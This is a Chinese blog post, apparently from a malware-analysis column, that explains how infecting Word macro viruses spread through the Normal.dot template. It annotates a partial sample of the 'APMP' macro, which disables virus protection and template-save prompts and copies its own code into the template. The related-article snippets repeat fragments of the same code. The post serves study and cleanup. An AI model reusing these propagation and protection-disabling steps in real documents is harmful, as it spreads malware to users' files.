感染型宏病毒原理

已于 2022-07-19 15:24:25 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: 恶意代码实战分析 文章标签: 感染型宏病毒
于 2022-07-11 18:22:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/singleyellow/article/details/125727009
版权
本文详细解析了感染型宏病毒的工作原理,它通过修改Word的缺省公用模板Normal.dot,使得宏代码在用户创建新文档时自动植入。示例分析展示了宏代码结构,并提供了针对XP和Win7以上系统的公用模板删除路径,以清除病毒感染。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、原理

Word文件的生成是通过模板来创建。一般情况下,Word自动将新文档基于缺省的公用模板(Normal.dot);感染型宏病毒通过修改缺省的公用模板中的宏代码,在用户使用word系统并用到缺省的公用模板时,这段宏代码就随着进入到新的文档中。

二、示例分析

宏代码+注释如下:

'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False '不显示状态栏,防止显示宏的运行状态
   Options.VirusProtection = False '关闭病毒保护功能
   Options.SaveNormalPrompt = False '如果公用模板被修改,不显示提示窗口,直接保存
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) '
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule '待修改的公用模板
   If ThisDocument = NormalTemplate Then _ '如果打开的是公用模板
      Set Host = ActiveDocume
了解本专栏 订阅专栏 解锁全文
宏与宏病毒——学习笔记
Yoo_666的博客
07-17 1923
文章目录前言宏定义宏病毒定义系统要求/特性支持系统特点共性Word宏病毒(若对宏或宏病毒有一定了解可直接跳转于此)工作原理Word宏及其运行条件判断方法清除方法预防方法经典宏病毒参考文献 前言 宏 定义 在百度百科的解释是:宏就是一些命令组织在一起,作为一个单独命令完成一个特定任务。Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。Word使用宏语言Visual Basic将宏作为一系列指令来编写。结合定义及其他技术博客,个人
一个搞笑的宏病毒apmp kill
weixin_43231078的博客
04-03 3630
今天公司的没什么乱用的沙箱又报警了,还是老样子,钓鱼邮件。 黄老师把邮件发过来,我看了下 标题是xxx会议通知,附件一个doc,一个rar: 会议通知,看上去确实比较可疑。先用winhex打开rar。 只有ace格式才会被恶意解析。再看内容是3个jpg。看上去没啥问题。好下一个。 再看doc。 处理doc的原则是千万别在实体机上点开任何doc,教训太惨痛……我这台机器又没有装虚...
宏病毒的工作原理与防治技术
11-19
宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取控制权,达到传染目的。 目前在可被宏病毒感染的文件中,以Word,Excel居多。Word宏病毒与Excel宏病毒的特性较为相似,因此仅以word宏病毒为例,说明宏病毒的作用,传染以及发作的机理和特性。
宏病毒技术原理与防范技术综述
12-19
介绍了宏病毒及其特点,从多个方面分析宏病毒的工作原理,详细说明宏病毒的传播危害及防治方法。最后介绍几个著名的宏病毒,并通过对代码的分析,加深对宏病毒的了解。
记一次宏病毒分析
Boom!脑洞大爆炸的博客
06-18 931
记一次宏病毒分析
东华大学计算机病毒课实验六宏病毒实验报告.doc
11-17
计算机病毒课实验六宏病毒实验报告...同时,需要了解宏病毒原理和危害性,以便更好地防范宏病毒的攻击。 本实验报告通过两个简单的宏病毒示例,演示了宏病毒原理和安全漏洞,提高了防范意识,提高了计算机安全性。
宏病毒原理与影响:计算机病毒深度解析
3. **宏病毒机制**:宏病毒的工作原理通常是先感染一个模板或正常文档,当用户打开受感染的文档并启用宏,病毒就会激活,修改或创建新的宏,将自身传播到其他文档,或者执行破坏性操作,如删除文件、篡改数据或下载...
v.rar_宏病毒
09-23
宏病毒】是一种特殊类的计算机病毒...总之,宏病毒利用宏功能的特性进行传播和破坏,用户应了解其工作原理,提高警惕,采取必要的安全措施以防止感染。通过教育和预防,我们可以大大降低宏病毒对个人和组织的威胁。
计算机宏病毒分析及清除实验.pdf
03-28
以下是对宏病毒的基本理解、其工作原理以及清除策略的详细阐述: 一、宏病毒机理 宏病毒是一种利用微软Office软件中的宏功能进行自我复制和传播的恶意代码。宏是预定义的一系列命令,可以自动化执行特定任务。当...
Word宏病毒实验
最新发布
m0_60525421的博客
10-16 1495
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")实际上,模板的病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其他已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查看每一个受感染文档的模板,如果存在病毒代码,都进行一次清除。关闭文档的时候也会执行同样的询问。
宏病毒免疫
11-22
在公司办公经常遇到宏病毒,有的时候打开excel,就自动新建名字为marco的sheet工作簿,或者自动发邮件,杀毒软件难以清除。 本免疫工具在启动excel时自动加载,先清除带宏病毒的模块,我自己用了很久了,还不错,分享给大家!
APMP
weixin_34347651的博客
12-05 1412
1) 宏病毒代码自我隐藏2) 感染其他打开的word文档3) 检查感染标志“APMP”'APMP'KILLPrivate Sub DocumentOpen()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.VirusProtection = FalseOptions.SaveNormalPrompt = FalseMy...
Excel如何破解vba的宏密码及恶意文档样本分析
小龙人
02-07 8122
EXCEL破解VB宏密码,即解除工程属性的密码,恶意文档样本分析
office宏病毒专杀
aeaxea43的博客
05-04 1331
给有需要的兄弟。 http://kk04.cn/f-6281.html
Office宏病毒防范与清理指南
weixin_31715353的博客
10-09 1904
本文还有配套的精品资源,点击获取 简介:Office宏病毒是通过Microsoft Office软件宏功能传播的恶意软件,能够导致数据丢失、系统瘫痪。本文介绍了防范措施和清理方法,包括软件更新、宏禁用、使用专业反病毒软件,以及用户教育和安全策略的重要性。通过安装"Office病毒专杀"工具,用户可以提升系统对宏病毒的防护能力,同时应采取多层防线确保安全。 1. O...
打开word文档总是自动弹出控件工具条的解决办法:
weixin_34266504的博客
02-16 1374
打开word文档总是自动弹出控件工具条的解决办法:1、查看是否word文档和模板中了'apmp宏病毒,按ALT+F11组合键,双击当前文档下属的ThisDocument,清空里面的内容;双击Normal-Micorsoft word对象-ThisDocument,清空里面的内容。然后把word宏安全性设置为高,即可防止宏病毒再次感染,切勿照着网上说的把word宏安全性设置为低。如果确定有宏病毒,建...
xls文件感染宏病毒的处理方法
zhhyyspy的专栏
03-18 5402
今天老师给了一个感染宏病毒的XLS文件,QQ杀毒检不出病毒(这娱乐杀毒软件当然了) 具体表现为打开后会不断重复打开本文件,导致打开的窗口指数增加,最终死机 U盘拷回来后,windows defender立即检测出了病毒 问题不在于杀毒,而是在于杀毒后怎么保留XLS里面的信息,就是无损杀毒 WD提供的选项只有隔离和删除,文件也不给你打开
Word宏病毒
热门推荐
qq_43717119的博客
06-22 1万+
Word宏病毒 【实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

拜乔布斯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值